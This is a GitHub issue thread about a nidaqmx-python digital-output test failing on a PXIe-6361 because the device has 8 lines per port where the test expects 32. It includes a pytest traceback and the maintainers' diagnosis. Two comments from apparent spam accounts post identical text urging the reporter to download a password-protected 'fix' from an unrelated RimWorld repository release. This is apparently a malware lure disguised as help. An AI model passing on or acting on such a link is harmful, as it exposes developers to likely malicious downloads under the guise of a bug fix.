ni/nidaqmx-python #629: DO stream writer test failure with PXIe-6361

WayneDroid, 2024-08-29:
I did regression test and observe a test failure on test___digital_multi_channel_writer___write_one_sample_multi_line_jagged___updates_output test case. I haven't spent time to look into the details yet.

Tested on PXIe-6361 and PXIe-6363, failure only happens on PXIe-6361. I did a quick search; the test case was added in #618. 

```
======================================================================== FAILURES =========================================================================
_____________________ test___digital_multi_channel_writer___write_one_sample_multi_line_jagged___updates_output[library_init_kwargs] ______________________

di_port0_loopback_task = Task(name=_unnamedTask<23F>), di_port1_loopback_task = Task(name=_unnamedTask<240>)
di_port2_loopback_task = Task(name=_unnamedTask<241>), generate_task = <function generate_task.<locals>._create_task at 0x0000027C56497040>
real_x_series_device = Device(name=real6361)

    def test___digital_multi_channel_writer___write_one_sample_multi_line_jagged___updates_output(
        di_port0_loopback_task: nidaqmx.Task,
        di_port1_loopback_task: nidaqmx.Task,
        di_port2_loopback_task: nidaqmx.Task,
        generate_task: Callable[[], nidaqmx.Task],
        real_x_series_device: nidaqmx.system.Device,
    ) -> None:
        task = generate_task()
        for port in real_x_series_device.do_ports:
            task.do_channels.add_do_chan(
                port.name,
                line_grouping=LineGrouping.CHAN_FOR_ALL_LINES,
            )
        _start_do_task(task, is_port=True, num_chans=task.number_of_channels)
        writer = DigitalMultiChannelWriter(task.out_stream)
        num_channels = task.number_of_channels
        samples_to_write = 0xA5

        # "sweep" up to the final value, the only one we'll validate
        for datum in _get_digital_data(num_channels * 32, samples_to_write):
            data_to_write = _int_to_bool_array(num_channels * 32, datum).reshape((num_channels, 32))
>           writer.write_one_sample_multi_line(data_to_write)

tests\component\test_stream_writers_do.py:468:
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
generated\nidaqmx\stream_writers.py:1256: in write_one_sample_multi_line
    self._verify_array_digital_lines(data, True, True)
generated\nidaqmx\stream_writers.py:156: in _verify_array_digital_lines
    self._task._raise_invalid_num_lines_error(
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

self = Task(name=_unnamedTask<242>), num_lines_expected = 8, num_lines_in_data = 32

    def _raise_invalid_num_lines_error(
            self, num_lines_expected, num_lines_in_data):
>       raise DaqError(
            'Specified read or write operation failed, because the number '
            'of lines in the data for a channel does not match the number '
            'of lines in the channel.\n\n'
            'If you are using boolean data, make sure the array dimension '
            'for lines in the data matches the number of lines in the '
            'channel.\n\n'
            'Number of Lines Per Channel in Task: {}\n'
            'Number of Lines Per Channel in Data: {}'
            .format(num_lines_expected, num_lines_in_data),
            DAQmxErrors.NUM_LINES_MISMATCH_IN_READ_OR_WRITE,
            task_name=self.name)
E       nidaqmx.errors.DaqError: Specified read or write operation failed, because the number of lines in the data for a channel does not match the number of lines in the channel.
E
E       If you are using boolean data, make sure the array dimension for lines in the data matches the number of lines in the channel.
E
E       Number of Lines Per Channel in Task: 8
E       Number of Lines Per Channel in Data: 32
E
E       Task Name: _unnamedTask<242>
E
E       Status Code: -200463

generated\nidaqmx\task\_task.py:1065: DaqError
```

telfaw, 2024-08-29:
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

syedmaaz9905, 2024-08-29:
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

zhindes, 2024-08-29:
Ah yeah, the 6361 only has 8 lines on its port0. We can update the fixture to require a device that has 32 lines and skip otherwise, or update the test to work with 8 lines. Given the name, I suspect more than 8 lines is important for validation.

WayneDroid, 2024-08-29:
@alynch-ni I did a quick look, seeing that PXIe-6361 only supports 8 lines per channel, in the test case, the number of lines is expected 32 lines. So, the lines comparison is failed, and the remaining datum check will fail.

closed 2025-06-11 by TanYiQing